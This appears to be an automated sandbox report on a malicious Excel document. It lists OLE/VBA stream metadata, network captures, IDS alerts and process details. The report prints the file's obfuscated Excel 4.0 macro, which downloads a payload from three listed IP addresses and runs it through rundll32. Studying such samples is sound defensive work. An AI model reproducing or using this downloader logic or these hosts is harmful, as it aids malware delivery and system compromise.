    Stream Path: VBA/dir, File Type: data, Stream Size: 725
    General
    Stream Path:VBA/dir
    File Type:data
    Stream Size:725
    Entropy:6.57361496255
    Base64 Encoded:True
    Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . e . . b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
    Data Raw:01 d1 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 65 9d 8e 62 02 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
    Stream Path: VBA/\x1051\x1080\x1089\x10901, File Type: data, Stream Size: 990
    General
    Stream Path:VBA/\x1051\x1080\x1089\x10901
    File Type:data
    Stream Size:990
    Entropy:3.21342337004
    Base64 Encoded:True
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 92 bf cf a9 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Stream Path: VBA/\x1051\x1080\x1089\x10902, File Type: data, Stream Size: 990
    General
    Stream Path:VBA/\x1051\x1080\x1089\x10902
    File Type:data
    Stream Size:990
    Entropy:3.2143784083
    Base64 Encoded:True
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . E . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 92 bf a2 45 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Stream Path: VBA/\x1051\x1080\x1089\x10903, File Type: data, Stream Size: 990
    General
    Stream Path:VBA/\x1051\x1080\x1089\x10903
    File Type:data
    Stream Size:990
    Entropy:3.21351502146
    Base64 Encoded:True
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . + . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 92 bf fe 2b 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Stream Path: VBA/\x1069\x1090\x1072\x1050\x1085\x1080\x1075\x1072, File Type: data, Stream Size: 994
    General
    Stream Path:VBA/\x1069\x1090\x1072\x1050\x1085\x1080\x1075\x1072
    File Type:data
    Stream Size:994
    Entropy:3.23027108917
    Base64 Encoded:True
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 92 bf 9d 8b 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

    Macro 4.0 Code

    ="uRlMon"!="URLDow"(0, ="http://185.14.31.59/"=NOW().dat, ..\Nuydar.veryrf, 0, 0)
    
    ,,,,,1,,,,,,9,,,,,,,"=ON.TIME(NOW()+""00:00:02"",""JEIUYUITRYF"")",,,"=CONCATENATE(AG101,AH95,AG99,AG100)",=NOW(),,,,,"=CONCATENATE(AG102,AH95,AG99,AG100)",,,,,,"=CONCATENATE(AG103,AH95,AG99,AG100)",,,=HALT(),,,,"=CONCATENATE(AG106,AG107)",,,,,.d,,"=""uRlMon""",,,,at,,,,,,"=""http://185.14.31.59/""",,"=""JJCCBB""",,,,http://45.138.157.63/,,Belandes,,,,"=""http://167.114.48.59/""",,,,"=REGISTER(AI99,AH98,AI101,AI102,,1,9)",,,=GOTO(AE103),,,"=Belandes(0,AG95,AI105,0,0)",,,,..\Nuydar.veryrf,,"=IF(AE105<0, Belandes(0,AG96,AI105,0,0))",,"=""URLDow""",,,,"=IF(AE106<0, Belandes(0,AG97,AI105,0,0))",,"=""nloadToFileA""",,,,,,,,,,"=IF(AE107<0,CLOSE(0),)",,,,,,,,,,,,=GOTO(Nols!H6),,,,,
    ,"=""r""",,"=""undll32 ..\Nuydar.veryrf,DllReg""","=""isterServer""",,,,,=EXEC(I7&I9&I10),,,,=HALT(),

    Network Behavior

    Snort IDS Alerts

    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
    05/12/21-12:45:24.031174TCP1201ATTACK-RESPONSES 403 Forbidden8049165185.14.31.59192.168.2.22
    05/12/21-12:45:24.229427TCP1201ATTACK-RESPONSES 403 Forbidden804916645.138.157.63192.168.2.22
    05/12/21-12:45:24.915862TCP1201ATTACK-RESPONSES 403 Forbidden8049167167.114.48.59192.168.2.22

    Network Port Distribution

    TCP Packets

    TimestampSource PortDest PortSource IPDest IP
    May 12, 2021 12:45:23.786555052 CEST4916580192.168.2.22185.14.31.59
    May 12, 2021 12:45:23.834789038 CEST8049165185.14.31.59192.168.2.22
    May 12, 2021 12:45:23.834898949 CEST4916580192.168.2.22185.14.31.59
    May 12, 2021 12:45:23.835686922 CEST4916580192.168.2.22185.14.31.59
    May 12, 2021 12:45:23.883733034 CEST8049165185.14.31.59192.168.2.22
    May 12, 2021 12:45:24.031173944 CEST8049165185.14.31.59192.168.2.22
    May 12, 2021 12:45:24.031374931 CEST4916580192.168.2.22185.14.31.59
    May 12, 2021 12:45:24.058603048 CEST4916680192.168.2.2245.138.157.63
    May 12, 2021 12:45:24.140259027 CEST804916645.138.157.63192.168.2.22
    May 12, 2021 12:45:24.140393972 CEST4916680192.168.2.2245.138.157.63
    May 12, 2021 12:45:24.141089916 CEST4916680192.168.2.2245.138.157.63
    May 12, 2021 12:45:24.222244024 CEST804916645.138.157.63192.168.2.22
    May 12, 2021 12:45:24.229427099 CEST804916645.138.157.63192.168.2.22
    May 12, 2021 12:45:24.229553938 CEST4916680192.168.2.2245.138.157.63
    May 12, 2021 12:45:24.244726896 CEST4916780192.168.2.22167.114.48.59
    May 12, 2021 12:45:24.374814987 CEST8049167167.114.48.59192.168.2.22
    May 12, 2021 12:45:24.374962091 CEST4916780192.168.2.22167.114.48.59
    May 12, 2021 12:45:24.375587940 CEST4916780192.168.2.22167.114.48.59
    May 12, 2021 12:45:24.505544901 CEST8049167167.114.48.59192.168.2.22
    May 12, 2021 12:45:24.915862083 CEST8049167167.114.48.59192.168.2.22
    May 12, 2021 12:45:24.916012049 CEST4916780192.168.2.22167.114.48.59
    May 12, 2021 12:46:29.028768063 CEST8049165185.14.31.59192.168.2.22
    May 12, 2021 12:46:29.028867960 CEST4916580192.168.2.22185.14.31.59
    May 12, 2021 12:46:29.229654074 CEST804916645.138.157.63192.168.2.22
    May 12, 2021 12:46:29.229835987 CEST4916680192.168.2.2245.138.157.63
    May 12, 2021 12:46:29.919058084 CEST8049167167.114.48.59192.168.2.22
    May 12, 2021 12:46:29.919239044 CEST4916780192.168.2.22167.114.48.59
    May 12, 2021 12:47:23.702902079 CEST4916780192.168.2.22167.114.48.59
    May 12, 2021 12:47:23.703178883 CEST4916680192.168.2.2245.138.157.63
    May 12, 2021 12:47:23.703422070 CEST4916580192.168.2.22185.14.31.59
    May 12, 2021 12:47:23.751594067 CEST8049165185.14.31.59192.168.2.22
    May 12, 2021 12:47:23.784185886 CEST804916645.138.157.63192.168.2.22
    May 12, 2021 12:47:23.832983017 CEST8049167167.114.48.59192.168.2.22

    HTTP Request Dependency Graph

    • 185.14.31.59
    • 45.138.157.63
    • 167.114.48.59

    HTTP Packets

    Session IDSource IPSource PortDestination IPDestination PortProcess
    0192.168.2.2249165185.14.31.5980C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    TimestampkBytes transferredDirectionData
    May 12, 2021 12:45:23.835686922 CEST0OUTGET /44313,6048108796.dat HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 185.14.31.59
    Connection: Keep-Alive
    May 12, 2021 12:45:24.031173944 CEST1INHTTP/1.1 403 Forbidden
    Server: nginx
    Date: Wed, 12 May 2021 10:45:24 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


    Session IDSource IPSource PortDestination IPDestination PortProcess
    1192.168.2.224916645.138.157.6380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    TimestampkBytes transferredDirectionData
    May 12, 2021 12:45:24.141089916 CEST1OUTGET /44313,6048108796.dat HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 45.138.157.63
    Connection: Keep-Alive
    May 12, 2021 12:45:24.229427099 CEST2INHTTP/1.1 403 Forbidden
    Server: nginx
    Date: Wed, 12 May 2021 10:45:24 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


    Session IDSource IPSource PortDestination IPDestination PortProcess
    2192.168.2.2249167167.114.48.5980C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    TimestampkBytes transferredDirectionData
    May 12, 2021 12:45:24.375587940 CEST3OUTGET /44313,6048108796.dat HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 167.114.48.59
    Connection: Keep-Alive
    May 12, 2021 12:45:24.915862083 CEST4INHTTP/1.1 403 Forbidden
    Server: nginx
    Date: Wed, 12 May 2021 10:45:24 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


    Code Manipulations

    Statistics

    CPU Usage

    Click to jump to process

    Memory Usage

    Click to jump to process

    High Level Behavior Distribution

    Click to dive into process behavior distribution

    System Behavior

    General

    Start time:12:45:39
    Start date:12/05/2021
    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    Wow64 process (32bit):false
    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Imagebase:0x13f3d0000
    File size:27641504 bytes
    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Disassembly

    Reset < >